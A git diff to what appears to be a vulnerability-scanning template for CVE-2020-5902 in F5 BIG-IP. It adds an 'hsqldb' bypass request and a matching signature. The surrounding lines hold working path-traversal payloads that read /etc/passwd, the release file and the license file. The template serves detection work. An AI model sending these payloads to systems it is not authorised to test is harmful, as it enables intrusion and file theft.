CVE-2020-5902 added hsqldb bypass
parent
7b1c5403e4
commit
986a49f6d1
|
@ -2,7 +2,7 @@ id: CVE-2020-5902
|
|||
|
||||
info:
|
||||
name: F5 BIG-IP TMUI RCE
|
||||
author: madrobot & dwisiswant0
|
||||
author: madrobot & dwisiswant0 & ringo
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
|
@ -11,6 +11,7 @@ requests:
|
|||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
|
||||
- "{{BaseURL}}/hsqldb%0a"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
@ -21,6 +22,7 @@ requests:
|
|||
- "root:[x*]:0:0:"
|
||||
- "BIG-IP release ([\\d.]+)"
|
||||
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
|
||||
- "HSQL Database Engine Servlet"
|
||||
condition: or
|
||||
part: body
|
||||
- raw:
|
||||
|
@ -59,4 +61,4 @@ requests:
|
|||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "h3ll0_w0Rld"
|
||||
- "h3ll0_w0Rld"
|
||||
|
|
Loading…
Reference in New Issue